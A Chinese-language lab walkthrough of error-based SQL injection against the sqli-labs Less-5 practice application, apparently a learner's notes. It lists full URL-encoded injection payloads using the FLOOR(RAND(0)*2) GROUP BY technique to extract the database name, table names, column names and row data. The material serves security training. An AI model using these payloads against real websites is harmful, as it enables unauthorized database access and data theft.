報錯型sql注入方法
1、判斷提交方式
字符型:
2、構造整合:
該出的整合方法爲 '
3、運用hackbar插件,可以得到要訪問的URL
庫名:security
點擊database會出現訪問數據庫的語句,將改語句複製粘貼至URL中,即可得到數據庫名。
URL語句:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
表名:emails
同上點擊tables,輸入數據庫名稱得到訪問表名
URL語句:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
列名:id
URL語句:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
數據:1
URL語句:
AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(id) AS CHAR),0x7e)) FROM security.emails LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)